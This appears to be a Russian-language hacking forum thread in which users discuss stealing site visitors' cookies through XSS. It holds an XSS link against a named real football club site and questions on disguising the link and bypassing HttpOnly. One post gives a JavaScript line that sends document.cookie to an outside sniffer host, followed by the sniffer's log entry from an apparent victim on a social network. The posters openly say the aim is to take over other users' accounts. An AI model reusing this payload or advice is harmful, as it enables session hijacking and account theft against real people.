Цитата:

Сообщение от Nick Hander

Смотря как обнаружил эту XSS.

XSS обнаружена в форме ввода некоторых данных.
P.S. Можем в ICQ поговорить на эту тему?

Привет! При использовании пассивки не приходят куки на сниффер. Нашел, что проблема в защите браузеров. Можно подробнее описать обход?

Ищи вектор под твой браузер, пробуй, экспериментируй: html5sec.org

Нашел XSS на сайте fc-zenit.ru
http://fc-zenit.ru/main/news/?ns=1&t...3C%2Fscript%3E

Объясните, что делать дальше с этим кодом? Если я хочу взломать пользователя сайта, то есть, угнать его куки, и как мне можно замаскировать код, можно ли сделать картинку заместо ссылки?

Статью перечитай. Там всё написано. Для тебя специально же писал.

снифер перезалей

Парни помогите обойти HttpOnly. Объясните по подробнее. Я прочитал пару статей на подобие этой http://raz0r.name/articles/httponly-bypass/ но все равно не чего не понял.

Всем привет, подскажите чайнику, я отправляю человеку скрипт
img = new Image(); img.src = "http://httpz.ru/n6sy94cxrff.gif?"+document.cookie;

он по нему переходит а на снифер приходит следующее :
31.10.2012 11:50:50 +02:00 []
IP: empty
Query: empty
REFERER: http://m.odnoklassniki.ru/dk?st.cmd=...=link&tkn=5905
AGENT: Opera/9.80 (J2ME/MIDP; Opera Mini/7.0.30362/28.2794; U; ru) Presto/2.8.119 Version/11.10 подскажите почему куки не приходят? что я делаю не правильно? заранее спасибо

Цитата:

Сообщение от Bugatti15047

Дак как же сделать ссылку, если уязвимость была найдена не в строке поиска сайта, а в стркое комментов.
Мне мои куки, конечно, вылазят, а как мне присобачит к этому снифер, да еще сделать так, чтобы он работал на этот сайте, если весь этот скрипт пашет только в строке комментарий?

JavaScript highlight